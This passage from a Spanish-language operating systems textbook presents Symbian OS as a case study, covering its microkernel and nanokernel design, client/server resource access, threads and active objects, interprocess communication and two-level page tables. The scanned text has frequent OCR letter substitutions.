12.2 GENERALIDADES SOBRE SYMBIAN OS 

Como vimos en ia sección anterior, Symbian OS pasó de ser un sistema operativo de boisiiio con¬ 
vertirse en un sistema operativo orientado de manera específica ai rendimiento en tiempo reai en 
una piataforma de teiéfonos móviies. En esta sección veremos ias generaiidades sobre ios concep¬ 
tos piasmados en ei diseño de Symbian OS. Estos conceptos corresponden de manera directa a ia 
forma en que se utiiiza ei sistema. 
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Symbian OS es único entre los sistemas operativos, ya que se diseñó con los teléfonos inte¬ 
ligentes como plataforma de destino. No es un sistema operativo genérico que se adaptó a un te¬ 
léfono inteligente a la fuerza, ni una adaptación de un sistema operativo más grande para una 
plataforma más pequeña. Sin embargo, tiene muchas de las características de los otros sistemas 
operativos más grandes, desde la multitarea y la administración de la memoria hasta las cuestio¬ 
nes de seguridad. 

Los antecesores de Symbian OS le otorgaron sus mejores características. Este sistema operati¬ 
vo está orientado a objetos, lo cual heredó de EPOC. Utiliza un diseño de microkernel que minimi¬ 
za la sobrecarga del kernel y pone la funcionalidad no esencial en los procesos de nivel de usuario, 
como se introdujo en la versión 6. Utiliza una arquitectura cliente/servidor que imita el modelo de 
motores integrado en EPOC. Admite muchas características de escritorio, incluyendo multitarea y 
multihilo, además de un sistema de almacenamiento extensible. También heredó un énfasis en mul¬ 
timedia y comunicaciones de EPOC y del cambio a Symbian OS. 


12.2.1 Orientación a objetos 

La orientación a objetos es un término que implica abstracción. Un diseño orientado a objetos crea 
una entidad abstracta, conocida como objeto, de los datos y la funcionalidad de un componente de 
software. Un objeto provee la funcionalidad y los datos especificados, pero oculta los detalles de 
implementación. Un objeto implementado en forma apropiada se puede eliminar o reemplazar por 
un objeto distinto, siempre y cuando la forma en que las demás piezas del sistema utilicen ese ob¬ 
jeto (es decir, mientras que su interfaz) sea igual. 

Cuando se aplica al diseño de un sistema operativo, la orientación a objetos significa que todo 
el uso de las llamadas al sistema y las características del lado del kernel se hace a través de interfa¬ 
ces, sin ningún tipo de acceso a los datos actuales o sin depender de un tipo de implementación. Un 
kernel orientado a objetos proporciona sus servicios a través de objetos. Utilizar objetos del lado 
del kernel por lo general significa que una aplicación debe obtener un mandador; es decir, una re¬ 
ferencia a un objeto, y después debe acceder a la interfaz de ese objeto por medio de su manejador. 

El diseño de Symbian OS está orientado a objetos. Las implementadones de las herramientas 
del sistema están ocultas: los datos del sistema se utilizan a través de interfaces definidas en los 
objetos del sistema. M ientras que un sistema operativo como Linux podría crear un descriptor de 
archivos y utilizarlo como un parámetro en una llamada a open, Symbian OS crearía un objeto 
de archivo y llamaría al método open conectado al objeto. Por ejemplo, es sabido que, en Linux, 
los descriptores de archivos son enteros que indexan una tabla en la memoria del sistema operati¬ 
vo: en Symbian OS se desconoce la implementación de las tablas del sistema de archivos, y toda 
la manipulación del sistema de archivos se realiza mediante objetos de una clase de archivo espe¬ 
cífica. 

Debe considerarse que Symbian OS difiere de otros sistemas operativos que utilizan conceptos 
orientados a objetos en cuanto a su diseño. Por ejemplo, muchos diseños de sistemas operativos uti¬ 
lizan tipos de datos abstractos: podríamos argumentar que la idea en sí de una llamada al sistema 
implementa la abstracción al ocultar los detalles de la implementación a los programas de usuario. 
En Symbian OS, la orientación a objetos está diseñada en todo el marco de trabajo del sistema ope- 
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rativo. La funcionalidad y las llamadas al sistema siempre se asocian con objetos del sistema. La 
asignación y protección de los recursos se concentra en la asignación de objetos, y no en la imple- 
mentación de las llamadas al sistema. 

12.2.2 Diseño del microkernel 

La estructura del kernel de Symbian OS tiene un diseño de microkernel basado en la naturaleza 
orientada a objetos de este sistema operativo. Las funciones mínimas del sistema y los datos es¬ 
tán en el kernel; muchas funciones del sistema se han metido en los servidores del espacio de 
usuario. Los servidores hacen su trabajo al obtener manejadores para los objetos del sistema y 
realizar llamadas al sistema por medio de estos objetos en el kernel cuando es necesario. Las apli¬ 
caciones en el espacio de usuario interactúan con estos servidores, en vez de realizar llamadas al 
sistema. 

Por lo general, los sistemas operativos basados en microkernel ocupan mucho menos memoria 
al momento de iniciar el sistema y su estructura es más dinámica. Los servidores se pueden iniciar 
según sea necesario: no todos se requieren al momento del inicio. En general, los microkerneis im- 
plementan una arquitectura conectadle con soporte para los módulos del sistema que se pueden car¬ 
gar y conectar al kernel cuando se requiera. De esta forma, los microkerneis son muy flexibles: el 
código para dar soporte a una nueva funcionalidad (por ejemplo, nuevos drivers de hardware) se 
puede cargar y conectar en cualquier momento. 

Symbian OS se diseñó como un sistema operativo basado en microkernel. Para acceder a los 
recursos del sistema, se abren conexiónese los servidores de recursos que a su vez coordinan el ac¬ 
ceso a los mismos recursos. Symbian OS luce una arquitectura conectadle para las nuevas imple- 
mentaciones. Estas nuevas implementaciones para las funciones del sistema se pueden diseñar 
como objetos del sistema y se pueden insertaren el kernel de manera dinámica. Por ejemplo, se pue¬ 
den implementar nuevos sistemas de archivos y agregarlos al kernel cuando el sistema operativo es¬ 
té en ejecución. 

Este diseño de microkernel conlleva ciertas cuestiones. Siempre que una llamada al sistema es 
suficiente para un sistema operativo convencional, un microkernel utiliza el paso de mensajes. El 
rendimiento puede verse afectado debido a la sobrecarga adicional de la comunicación entre los ob¬ 
jetos. La eficiencia de las funciones que permanecen en el espacio de kernel en los sistemas opera¬ 
tivos convencionales disminuye cuando esas funciones se pasan al espacio de usuario. Por ejemplo, 
la sobrecarga de varias llamadas a funciones para programar procesos puede reducir el rendimien¬ 
to si se le compara con la programación de procesos del kernel de Windows, que tiene acceso di¬ 
recto a las estructuras de datos del kernel. Como los mensajes pasan entre los objetos en espacio de 
usuario y los objetos en espacio de kernel, es probable que ocurran cambios en los niveles de pri¬ 
vilegios, con lo cual se reduce aún más el rendimiento. Por último, mientras que las llamadas al sis¬ 
tema funcionan en un solo espacio de direcciones para los diseños convencionales, este paso de 
mensajes y cambio de privilegios implica el uso de dos o más espacios de direcciones para implemen¬ 
tar una petición deservicio al microkernel. 

Estas cuestiones de rendimiento obligaron a los diseñadores de Symbian OS (y también de 
otros sistemas basados en microkernel) a poner mucha atención en los detalles de diseño e imple- 
mentación. El énfasis del diseño es para los servidores mínimos, que están muy enfocados. 
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12.2.3 El nanokernel deSymbian OS 

Para lidiar con las cuestiones del microkernel, los diseñadores de Symbian OS implementaron una 
estructura de nanokernel en el núcleo del diseño del sistema operativo. Así como en las microker- 
nels se meten ciertas funciones del sistema en los servidores en espacio de usuario, el diseño de 
Symbian OS separa las funciones que requieren una implementadón complicada en el kernel 
de Symbian OS y mantiene sólo las funciones más básicas en el nanokernel, el núcleo del sistema 
operativo. 

El nanokernel proporciona algunas de las funciones más básicas en Symbian OS. En el na¬ 
nokernel, los hilos simples que operan en modo privilegiado implementan servicios muy primi¬ 
tivos. Entre las implementaciones en este nivel se incluyen las operaciones de programación y 
sincronización, el manejo de interrupciones y los objetos de sincronización, como los mutexes 
y los semáforos. La mayor parte de las funciones que se implementan en este nivel se pueden 
reemplazar. Las funciones en este nivel son muy primitivas (para que puedan ser rápidas). Por 
ejemplo, la asignación dinámica de memoria es una función muy complicada para una operación 
del nanokernel. 

Este diseño de nanokernel requiere un segundo nivel para implementar funciones más compli¬ 
cadas del kernel. El nivel del kernel de Symbian OS proporciona las funciones más complicadas 
del kernel que necesita el resto del sistema operativo. Cada operación en el nivel del kernel deSym¬ 
bian OS es una operación privilegiada y se combina con las operaciones primitivas del nanokernel 
para implementar tareas más complejas del kernel. Los servicios de objetos complejos, los hilos en 
modo de usuario, la planificación de procesos y el cambio de contexto, la memoria dinámica, las 
bibliotecas que se cargan en forma dinámica, la sincronización compleja, los objetos y la comuni¬ 
cación entre procesos son sólo algunas de las operaciones que se implementan en este nivel, el cual 
se puede reemplazar por completo y las interrupciones pueden hacer que este nivel reprograme 
cualquier parte de su ejecución, ¡incluso en medio de un cambio de contexto! 

La figura 12-1 muestra un diagrama de la estructura completa del kernel de Symbian OS. 


12.2.4 Acceso a los recursos de cliente/servidor 

Como dijimos antes, Symbian OS explota el diseño de su microkernel e incluye un modelo clien¬ 
te/servidor para acceder a los recursos del sistema. Las aplicaciones que necesitan acceder a los re¬ 
cursos del sistema son los clientes: los servidores son programas que el sistema operativo ejecuta 
para coordinar el acceso a estos recursos. M ientrasqueen Linux podríamos llamar a open para abrir 
un archivo, o en Windows usar una API de M icrosoft para crear una ventana, en Symbian OS am¬ 
bas secuencias son iguales: primero se debe hacer una conexión a un servidor, éste debe recono¬ 
cer la conexión y hay que hacerle peticiones para realizar ciertas funciones. Por lo tanto, abrir un 
archivo significa que hay que buscar el servidor de archivos, llamar a connect para establecer una 
conexión con el servidor y después enviarle una petición open con el nombre de un archivo espe¬ 
cífico. 

Hay varias ventajas de esta forma de proteger los recursos. En primer lugar, se adapta al 
diseño del sistema operativo como un sistema orientado a objetos y como un sistema basado en 
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microkernel. En segundo lugar, este tipo de arquitectura es muy efectivo para administrar ios múi- 
tipies accesos a ios recursos dei sistema que requeriría un sistema operativo muititareas y muitihi- 
io. Por úitimo, cada servidor se puede enfocar en ios recursos que debe administrar; además se 
puede actuaiizar con faciiidad e intercambiar por nuevos diseños. 


12.2.5 C aracterísticas de un sistema operativo más grande 

A pesar dei tamaño de sus computadoras de destino, Symbian OS tiene muchas de i as característi¬ 
cas de sus parientes más grandes. A unque podemos esperar ei mismo tipo de soporte que vemos en 
ios sistemas operativos más grandes como Linux y Windows, io más seguro es que encontremos es¬ 
tas características en una forma distinta. Symbian OS tiene muchas características en común con ios 
sistemas operativos más grandes. 

Procesos e hilos Symbian OS es un sistema operativo muititareas y muitihiio. M uchos 
procesos se pueden ejecutar en forma concurrente, se pueden comunicar entre sí y pueden 
uti i izar varios hi i os que se ejecutan en forma interna para cada proceso. 

Soporte común para los sistemas de archivos Symbian OS organiza ei acceso ai aima- 
cenamiento dei sistema mediante ei uso de un modeio de sistema de archivos, de iguai for¬ 
ma que ios sistemas operativos más grandes. Tiene un sistema de archivos compatibie con 
Windows (utiiiza de manera predeterminada un sistema de archivos FAT-32); admite otras 
impiementaciones de sistemas de archivos mediante ei uso de una interfaz estiio compie- 
mento. Symbian OS acepta varios tipos distintos de sistemas de archivos, inciuyendo FAT- 
16 y FAT-32, NTFS y muchos formatos de tarjetas de aimacenamiento (por ejempio, 
JFFS). 
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Redes Symbian OS acepta redes TCP/IP y varias interfaces más de comunicación, como 
seriai, infrarroja y Biuetooth. 

Administración de ia memoria Aunque Symbian OS no utiiiza memoria virtuai asigna¬ 
da (ni tiene ias herramientas para eiio), organiza ei acceso a ia memoria en páginas y per¬ 
mite reempiazadas; es decir, traer páginas a ia memoria, pero no intercambiadas fuera de 
eiia. 

12.2.6 C omunicaciones y multimedia 

Symbian OS se creó para faciiitar ia comunicación en muchas formas. Es difícii ver sus generaii- 
dades sin mencionar ias características de comunicación. Ei modeiado de ia comunicación cumpie 
con ia orientación a objetos y a una arquitectura ciiente/servidor de microkernei. Las estructuras de 
comunicación en Symbian OS se basan en móduios, para poder injertar nuevos mecanismos de co¬ 
municación en ei sistema operativo con faciiidad. Es posibie escribir móduios para impiementar 
cuaiquier cosa, como ias interfaces a nivei de usuario, ias impiementaciones de nuevos protocoios 
o nuevos drivers de dispositivos. Debido ai diseño dei microkernei, es posibie introducir y cargar 
nuevos móduios en ia operación dei sistema en forma dinámica. 

Symbian OS tiene aigunas características únicas que provienen de su enfoque en ia piatafor- 
ma de teiáfonos inteiigentes. Tiene una arquitectura de mensajería conectabie, donde se puede in¬ 
ventar e impiementar nuevos tipos de mensajes mediante ei desarroiio de móduios que ei servidor 
de mensajería carga en forma dinámica. Ei sistema de mensajería se ha diseñado en niveies (con 
tipos específicos de objetos que impiementan ios diversos niveies). Por ejempio, ios objetos de 
transporte de mensajes están separados de ios objetos de tipo de mensaje. Por ejempio, una forma 
de transporte de mensajes (como CDM A) podría transportar varios tipos distintos de mensajes (ti¬ 
pos de mensajes de texto estándar, tipos SM S o comandos dei sistema como ios mensajes BIO). 
Se puede introducir nuevos métodos de transporte ai impiementar un nuevo objeto y cargario en 
ei kernei. 

Ei núcieo de Symbian OS está diseñado con APIs especi ai izadas para muiti media. Los dispo¬ 
sitivos y ei contenido muiti media se manejan mediante servidores especiaies y un marco de traba¬ 
jo que permite ai usuario impiementar móduios que describen ei contenido nuevo y ei existente, y 
qué se debe hacer con éi. Ei soporte de muiti media es a través de varias formas de objetos (aigo 
muy parecido a ia forma en que se impiementa ia mensajería), diseñados para interactuar entre sí. 
La forma en que se reproduce ei sonido se diseña como un objeto que interactúa con ia forma en 
que se impi ementa cada formato de sonido. 

12.3 PROCESOS E HILOS EN SYMBIAN OS 

Symbian OS es un sistema operativo muititareas que utiiiza ios conceptos de procesos e hiios en 
forma muy parecida a ios demás sistemas operativos. Sin embargo, ia estructura dei kernei de Sym¬ 
bian OS y ia forma en que trata con ia posibie escasez de recursos infiuyen en ia manera que ve es¬ 
tos objetos muititareas. 
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12.3.1 Hilosy nanohilos 

En vez de que los procesos sean la base de la multitarea, Symbian OS prefiere usar los hilos y se 
basa en este concepto. Los hilos forman la unidad central de la multitarea. El sistema operativo sim¬ 
plemente ve un proceso como una colección de hilos con un bloque de control de proceso y cierto 
espacio de memoria. 

El soporte de hilos en Symbian OS se basa en el nanokernel con nanohilos. El nanokernel pro¬ 
porciona sólo soporte simple para los hilos; cada hilo se sostiene mediante un nanohilo basado en 
nanokernel. El nanokernel proporciona la programación délos nanohilos, su sincronización (comu¬ 
nicación entre hilos) y los servicios de temporización. Los nanohilos se ejecutan en modo privile¬ 
giado y necesitan una pila para almacenar sus datos del entorno en tiempo de ejecución. Los 
nanohilos no se pueden ejecutar en modo de usuario. Este hecho significa que el sistema operativo 
puede mantener un estrecho control sobre cada uno de ellos. Cada nanohilo necesita un conjunto 
mínimo de datos para ejecutarse: en esencia, la ubicación de su pila y qué tan grande es. El sistema 
operativo lleva el control de todo lo demás, como el código que utiliza cada hilo, y almacena el con¬ 
texto de un hilo en su pila en tiempo de ejecución. 

Los nanohilos tienen estados de hilos, así como los procesos tienen estados. El modelo utiliza¬ 
do por el nanokernel de Symbian OS agrega unos cuantos estados al modelo básico. A demás de los 
estados básicos, los nanohilos pueden tener los siguientes estados: 

Suspendido Aquí es cuando un hilo suspende a otro hilo y debe ser distinto al estado en 
espera, donde un hilo se bloque mediante algún objeto de nivel superior (por ejemplo, un 
hilo de Symbian OS). 

Espera de semáforo rápido Un hilo en este estado espera a que se señale un semáforo rá¬ 
pido (un tipo de variable centinela). Los semáforos rápidos son semáforos a nivel de na¬ 
nokernel. 

Espera deDFC Un hilo en este estado está esperando que se agregue una llamada a fun¬ 
ción retrasada (DEC) a la cola de DFCs. Las DFCs se utilizan en la implementación dedri- 
vers de dispositivos. Representan llamadas al kernel que se pueden poner en cola y 
programar para ejecutarse mediante el nivel del kernel de Symbian OS. 

Inactivo Los hilos inactivos esperan a que transcurra una cantidad específica de tiempo. 

Otro Flay un estado genérico que se utiliza cuando los desarrolladores implementan esta¬ 
dos adicionales para los nanohilos. Los desarrolladores hacen esto cuando extienden la 
funcionalidad del nanokernel para nuevas plataformas de teléfonos (lo cual se conoce co¬ 
mo niveles de personalidad). Los desarrolladores que hacen esto también deben implemen- 
tar la forma en que se cambia de un estado a otro desde sus implementaciones extendidas. 

Compare la idea del nanohilo con la idea convencional de un proceso. Un nanohilo es en esencia 
un proceso ultraligero. Tiene un minicontexto que cambia a medida que los nanohilos se cambian 
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hacia/desde el procesador. Cada nanohilo tiene un estado, al igual que los procesos. Las claves pa¬ 
ra los nanohilosson el estrecho control que tiene el nanokernel sobre el los, y los datos mínimos que 
conforman el contexto de cada uno. 

Los hilos de Symbian OS se basan en los nanohilos; el kernel agrega el soporte más allá de lo 
que proporciona el nanokernel. Los hilos en modo de usuario que se utilizan para aplicaciones es¬ 
tándar se implementan mediante los hilos de Symbian OS. Cada hilo de Symbian OS contiene un 
nanohilo y agrega su propia pila en tiempo de ejecución a la pila que utiliza el nanohilo. Los hilos 
de Symbian OS pueden operar en modo de kernel mediante las llamadas al sistema. Symbian OS 
también agrega a la implementación el manejo de excepciones y la señalización al terminar. 

Los hilos de Symbian OS implementan su propio conjunto de estados encima de la implemen¬ 
tación del nanohilo. Como los hilos de Symbian OS agregan cierta funcionalidad a la implementa¬ 
ción mínima del nanohilo, los nuevos estados reflejan las nuevas ideas integradas en los hilos de 
Symbian OS. Este sistema operativo agrega siete nuevos estados en los que se pueden encontrar sus 
hilos, con énfasis en las condiciones de bloqueo especiales que pueden ocurrir a un hilo de Sym¬ 
bian OS. Estos estados especiales incluyen el de espera y suspensión en semáforos (normales), va¬ 
riables de mutex y variables de condición. Recuerde que, debido a la implementación de los hilos 
de Symbian OS encima de los nanohilos, estos estados se implementan en términos de estados de 
nanohilos, en su mayor parte mediante el uso del estado de nanohilo suspendido de varias formas. 

12.3.2 Procesos 

En Symbian OS, los procesos son hilos de Symbian OS agrupados bajo una sola estructura de blo¬ 
que de control de proceso, con un solo espacio de memoria. Puede haber sólo un hilo de ejecución, 
o varios hilos bajo un bloque de control de proceso. Los conceptos de estado del proceso y progra¬ 
mación del proceso ya se han definido mediante los hilos y nanohilos de Symbian OS. Entonces, la 
programación de un proceso se implementa en realidad mediante la planificación de un hilo y la ini- 
cialización del bloque de control de proceso correcto, de manera que el hilo lo utilice para sus ne¬ 
cesidades de datos. 

Los hilos de Symbian OS organizados bajo un solo proceso trabajan juntos de varias formas. 
En primer lugar, hay un solo hilo individual que se marca como el punto inicial para el proceso. En 
segundo lugar, los hilos comparten los parámetros de planificación. Si se cambian los parámetros 
(es decir, el método de planificación) para el proceso, se cambian los parámetros para todos los hi¬ 
los. En tercer lugar, los hilos comparten objetos del espacio de memoria, incluyendo los descripto¬ 
res de dispositivos y otros descriptores de objetos. Por último, cuando se termina un proceso el 
kernel termina todos los hilos en el proceso. 

12.3.3 Objetos activos 

Los objetos activos son formas especializadas de hilos, los cuales se implementan de tal forma que 
se aligere la carga que imponen en el entorno operativo. Los diseñadores de Symbian OS recono¬ 
cieron el hecho de que había muchas situaciones en las que se bloquearía un hilo en una aplicación. 
Como Symbian OS se enfoca en la comunicación, muchas aplicaciones tienen un patrón similar de 


940 


CASO DE ESTUDIO 3: SYMBIAN OS 


CAPITULO 12 


implementación: escriben datos en un socket de comunicación o envían información atravésdeuna 
tubería, y después se bioquean ai esperar una respuesta dei receptor. Los objetos activos están dise¬ 
ñados de manera que cuando regresan de este estado bioqueado, sóio se hace ia iiamada a un pun¬ 
to de entrada en su código. Esto simpiifica su impiementación. Como se ejecutan en espacio de 
usuario, ios objetos activos tienen ias propiedades de ios hiios de Symbian OS. Como taies, tienen 
su propio nanohiio y pueden unirse con otros hiios de Symbian OS para formar un proceso para ei 
sistema operativo. 

Si ios objetos activos son sóio hiios de Symbian OS, tai vez ei iector se pregunte qué ventaja 
obtiene ei sistema operativo de este modeio de hiios simpiificado. La ciave para ios objetos acti¬ 
vos está en ia pianificación. M ientras esperan eventos, todos ios objetos activos residen dentro de 
un soio proceso y pueden actuar como un soio hiio para ei sistema. Ei kernei no necesita compro¬ 
bar de manera continua cada objeto activo para ver si se puede desbioquear. Por io tanto, ios obje¬ 
tos activos en un soio proceso se pueden coordinar mediante un soio pianificador que se impiementa 
en un soio hiio. Ai combinar ei código, que de otra manera se impiementaría como varios hiios en 
un soio hiio, ai crear puntos de entrada fijos en ei código y mediante ei uso de un soio pianifica¬ 
dor para coordinar su ejecución, ios objetos activos forman una versión eficiente y iigera de ios hi¬ 
ios estándar. 

Es importante tener en cuenta en dónde se adaptan ios objetos activos en ia estructura de pro¬ 
cesos de Symbian OS. Cuando un hiio convencionai reaiiza una iiamada ai sistema que bioquea su 
ejecución mientras está en ei estado en espera, ei sistema operativo de todas formas necesita com¬ 
probar ei hiio. Entre ios cambios de contexto, ei sistema operativo invertirá su tiempo para compro¬ 
bar ios procesos bioqueados en ei estado en espera, para determinar si aiguno necesita pasar ai 
estado iisto. Los objetos activos secoiocan a sí mismos en ei estado en espera, y esperan a que ocu¬ 
rra un evento específico. Por io tanto, ei sistema operativo no necesita comprobados pero ios despie¬ 
za cuando se activa su evento específico. Ei resuitado es que se requieren menos comprobaciones de 
hiios y aumenta ei rendimiento. 


12.3.4 Comunicación entre procesos 

En un entorno muitihiio como Symbian OS, ia comunicación entre procesos es cruciai para ei ren¬ 
dimiento dei sistema. Los hiios, en especiai en forma de servidores dei sistema, se comunican de 
manera constante. 

Un Socket es ei modeio básico de comunicación utiiizado por Symbian OS. Es una iínea de tu¬ 
bería de comunicación abstracta entre dos extremos. La abstracción se utiiiza para ocuitar ios mé¬ 
todos de transporte y ia administración de ios datos entre ios extremos. Symbian OS utiiiza ei 
concepto de un socket para comunicarse entre ios ciientes y servidores, de hiios a dispositivos y en¬ 
tre ios mismos hiios. 

Ei modeio dei socket también forma ia base de ia E/S de dispositivos. De nuevo, ia abstracción 
es i a ciave para que este modeio sea tan útii. Toda i a mecánica dei intercambio de datos con un dis¬ 
positivo se administra mediante ei sistema operativo, en vez deque io haga ia apiicación. Por ejem- 
pio, ios sockets que funcionan a través de TCP/IP en un entorno de red se pueden adaptar con 
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facilidad para trabajar en un entorno Bluetooth, al cambiar los parámetros en el tipo de socket uti¬ 
lizado. El sistema operativo se encarga de la mayor parte del trabajo de intercambio délos datos en 
un cambio de este tipo. 

Symbian OS implementa las primitivas de sincronización estándar que se encuentran en un sis¬ 
tema operativo de propósito general. Se utilizan muchas formas de semáforos y mutexes a través 
del sistema operativo. Éstos proporcionan la sincronización entre los procesos y los hilos. 


12.4 ADMINISTRACIÓN DE LA MEMORIA 

La administración de la memoria en sistemas como Linux y Windows emplea muchos de los con¬ 
ceptos de los que hemos visto para implementar la administración de los recursos de memoria. Los 
conceptos como las páginas de memoria virtual que se crean a partir de los marcos de memoria fí¬ 
sica, la memoria virtual con paginación bajo demanda y el reemplazo dinámico de páginas se com¬ 
binan para dar la ilusión de tener recursos de memoria casi ilimitados, donde la memoria física se 
soporta y extiende mediante el almacenamiento como el espacio del disco duro. 

Como un sistema operativo de propósito general efectivo, Symbian OS también debe propor¬ 
cionar un modelo de administración de la memoria. Sin embargo, como el almacenamiento en los 
teléfonos inteligentes por lo general está muy limitado, el modelo de memoria es restringido y no 
utiliza un modelo de espacio de memoria virtual/intercambio para su administración de la memo¬ 
ria. Sin embargo, utiliza la mayoría de los otros mecanismos que hemos visto para administrar la 
memoria, incluyendo las M M Us de hardware. 

12.4.1 Sistemas sin memoria virtual 

M uchos sistemas de cómputo no tienen las herramientas para proporcionar memoria virtual com¬ 
pleta con paginación bajo demanda. El único almacenamiento disponible para el sistema operativo 
en estas plataformas es la memoria: no incluyen un disco duro. Debido a esto, la mayoría de los sis¬ 
temas más pequeños, desde los PDAs hasta los teléfonos inteligentes y los dispositivos de bolsillo 
de mayor nivel, no proporcionan memoria virtual con paginación bajo demanda. 

Considere el espacio de memoria utilizado en la mayoría de los dispositivos de plataformas pe¬ 
queñas. Por lo general, estos sistemas tienen dos tipos de almacenamiento: RAM y memoria flash. La 
RA M almacena el código del sistema operativo (que se va a utilizar al iniciar el sistema): la memoria 
flash se utiliza para la memoria operativa y el almacenamiento permanente (archivos). A menudo es 
posible agregar memoria flash adicional a un dispositivo (como una tarjeta Digital Segura, o SD), y 
esta memoria se utiliza de manera exclusiva para el almacenamiento indefinido. 

La ausencia de la memoria virtual con paginación bajo demanda no indica la ausencia de la 
administración de memoria. De hecho, la mayoría de las plataformas más pequeñas se basan en 
hardware que incluye muchas de las características de administración de los sistemas más gran¬ 
des. Esto incluye características como la paginación, la traducción de direcciones y la abstracción 
de direcciones virtuales/físicas. La ausencia de memoria virtual sólo indica que las páginas no se 
pueden intercambiar de la memoria y guardarse en el almacenamiento externo, pero aún se utiliza 
la abstracción de las páginas de memoria. Las páginas se reemplazan, pero la página que se va a 
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reemplazar sólo se descarta. Eso significa que sóio se pueden reempiazar páginas de código, ya 
que sóio esas se respaidan en ia memoria fiash. 

La administración de ia memoria consiste en ias siguientes tareas: 

Administración del tamaño de la aplicación Ei tamaño de una apiicación (código y da¬ 
tos) tiene un efecto contundente en cuanto a ia forma en que se utiiiza ia memoria. Se re¬ 
quiere habiiidad y discipiina para crear software pequeño. La presión de utiiizar un diseño 
orientado a objetos puede ser un obstácuio aquí (más objetos significan más asignación de 
memoria dinámica, io cuai impiica mayores tamaños dei montícuio). La mayoría de ios 
sistemas operativos para piataformas más pequeñas no recomiendan ia vincuiación estáti¬ 
ca de ios móduios. 

Administración del montículo Ei montícuio (ei espacio para ia asignación dinámica de 
memoria) se debe administrar en forma muy estricta en una piataforma más pequeña. Por 
io generai, ei espacio dei montícuio se iimita en ias piataformas más pequeñas para obii- 
gar a ios programadores a reciamar y reutiiizar ei espacio dei montícuio io más que pue¬ 
dan. Si se aventuran más aiiá de ios iímites, se producen errores en ia asignación de ia 
memoria. 

Ejecución en el lugar Las piataformas sin unidades de disco poriogenerai admiten iaeje- 
cución en ei iugar. Lo que esto significa es que ia memoria fiash se asigna ai espacio de 
direcciones virtuaies y ios programas se pueden ejecutar directamente de ia memoria fiash, 
sin necesidad de copiados primero en ia RAM .Ai hacer esto se reduce a cero ei tiempo de 
carga, ias apiicaciones pueden iniciar en forma instantánea y además no hay que ocupar ia 
RAM , que es escasa. 

Carga de DLLs La decisión de cuándo se deben cargar ias DLLs puede afectar en ia per¬ 
cepción dei rendimiento dei sistema. Por ejempio, es más aceptabie cargar todas ias DLLs 
cuando se carga una apiicación por primera vez en ia memoria, que cargadas en tiempos 
esporádicos durante ia ejecución. Los usuarios aceptarán con más disposición ei tiempo de 
retraso en ia carga de una apiicación que ios retrasos en ia ejecución. Tenga en cuenta que 
ias DLLs tai vez no se necesiten cargar. Este podría ser ei caso si (a) ya se encuentran en 
ia memoria, o (b) están contenidas en aimacenamiento fiash externo (en cuyo caso, se pue¬ 
den ejecutar en ei iugar). 

Transferencia déla administración déla memoria al hardware Si hay una M M U dis- 
ponibie, se utiiiza en toda su extensión. De hecho, entre másfuncionaiidad se pueda poner 
en ia M M U, mejor será ei rendimiento dei sistema. 

A un con ia regia de ejecución en ei iugar, ias pequeñas piataformas de todas formas necesitan 
memoria que está reservada para ia operación dei sistema operativo. Esta memoria se comparte con 
ei aimacenamiento permanente y por io generai se administra en una de dos formas. En primer iu¬ 
gar, aigunos sistemas operativos optan por una metodoiogía muy simpie y no paginan ia memoria. 
En estos tipos de sistemas, ei cambio de contexto significa asignar espacio de operación, espacio 
dei montón por ejempio, y compartir este espacio de operación entre todos ios procesos. Este mé¬ 
todo utiiiza poca o ninguna protección entre ias áreas de memoria de ios procesos, y confía en que 
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éstos trabajarán bien en conjunto. Palm OS aplica esta metodología simple para administrar la me¬ 
moria. El segundo método utiliza una metodología más disciplinada. En este método, la memoria 
se secciona en páginas que se asignan a las necesidades de operación. Las páginas se mantienen en 
una lista de páginas libres administrada por el sistema operativo, y se asignan según sea necesario 
al sistema operativo y los procesos de usuario. En esta metodología (debido a que no hay memoria 
virtual), cuando se agota la lista de páginas libres, el sistema se queda sin memoria y no se pueden 
realizar más asignaciones. Symbian OS es un ejemplo de este segundo método. 

12.4.2 Cómodirecciona Symbian OS la memoria 

Como Symbian OS es un sistema operativo de 32 bits, las direcciones pueden variar hasta 4 GB. 
Emplea las mismas abstracciones que los sistemas más grandes: los programas deben utilizar direc¬ 
ciones virtuales, que el sistema operativo asigna a direcciones físicas. Al igual que con la mayoría 
de los sistemas, Symbian OS divide la memoria en páginas virtuales y marcos físicos. El tamaño de 
los marcos es por lo general de 4 KB, pero puede ser variable. 

Como puede haber hasta 4 GB de memoria, un tamaño de marco de 4 KB representa a una ta¬ 
bla de páginas con más de un millón de entradas. Con tamaños limitados de memoria, Symbian OS 
no puede dedicar 1 M B a la tabla de páginas. Además, los tiempos de búsqueda y acceso para una 
tabla tan grande serían una carga para el sistema. Para resolver esto, Symbian OS adopta una estra¬ 
tegia de tabla de páginas de dos niveles, como se muestra en la figura 12-2. El primer nivel cono¬ 
cido como directorio de páginas, proporciona un vínculo al segundo nivel y se indexa mediante 
una porción de la dirección virtual (los primeros 12 bits). Este directorio se mantiene en la memo¬ 
ria y el TTBR (translation table base register, registro base de tabla de traducción) apunta a él. 
Una entrada en el directorio de páginas apunta al segundo nivel, que es una colección de tablas de 
páginas. Estas tablas proporcionan un vínculo a una página específica en memoria y sel ndexan me¬ 
diante una porción de la dirección virtual (los 8 bits de en medio). Por último, la palabra en la pá¬ 
gina referenciada se indexa mediante los 12 bits de menor orden de la dirección virtual. El hardware 
ayuda en este cálculo de asignación de dirección virtual a física. A unque Symbian OS no puede asu¬ 
mirla existencia de ningún tipo de asistencia de hardware, la mayor parte de las arquitecturas en la 
que se implementa tienen M M Us. Por ejemplo, el procesador ARM tiene una M M U extensa, con 
un búfer de traducción adelantada para ayudar en el cálculo de las direcciones. 

Cuando una página no está en la memoria, se produce una condición de error debido a que to¬ 
das las páginas de memoria de una aplicación se deben cargar al momento de iniciar esta aplicación 
(no hay paginación bajo demanda). Las bibliotecas que se cargan en forma dinámica se llevan de 
manera explícita hacia la memoria mediante pequeños trozos auxiliares de código vinculado al eje¬ 
cutable de la aplicación, y no mediante fallos de página. 

A pesar de la falta de intercambio, la memoria es sorprendentemente dinámica en Symbian OS. 
El contexto de las aplicaciones se cambia a través de la memoria y, como se dijo antes, se cargan 
sus requerimientos en la memoria cuando empiezan su ejecución. Las páginas de memoria que re¬ 
quiere cada aplicación se pueden solicitar de manera estática al sistema operativo, al momento de 
cargar la aplicación en la memoria. El espacio dinámico (es decir, para el montículo) está limitado, 
por lo que también se pueden realizar peticiones estáticas para el espacio dinámico. Los marcos de 
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dirección virtuai 



Figura 12-2. Symbian OS utiliza una tabla de páginas de dos niveles para reducir el 
